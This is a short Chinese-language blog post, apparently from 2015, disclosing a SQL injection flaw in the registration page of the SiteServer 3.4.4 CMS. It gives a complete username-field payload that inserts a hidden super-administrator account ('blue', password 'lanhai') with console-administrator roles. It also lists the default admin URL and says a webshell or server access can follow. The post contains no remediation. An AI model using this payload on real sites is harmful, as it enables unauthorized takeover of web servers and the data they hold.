SiteServer 3.4.4 逻辑漏洞导致SQL注入

SiteServer 3.4.4 某业务流程逻辑错误，导致SQL注入，从而得到后台管理权限，进而拿到webshell。也可直接利用sqlserver配置不当拿到webshell或服务器权限

Example:

http://127.0.0.1/UserCenter/register.aspx

用户名填入以下语句，其他地方正常填写。

123');insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

提交注册之后就往库里面插入了一个用户名为：blue 密码为：lanhai 的超级用户。

默认后台地址为：http://127.0.0.1/siteserver

posted @ 2015-10-30 15:11 小生观察室阅读(1143) 评论(0) 编辑收藏举报

刷新页面返回顶部

小生观察室

公众号：小生观察室

SiteServer 3.4.4 逻辑漏洞导致SQL注入

公告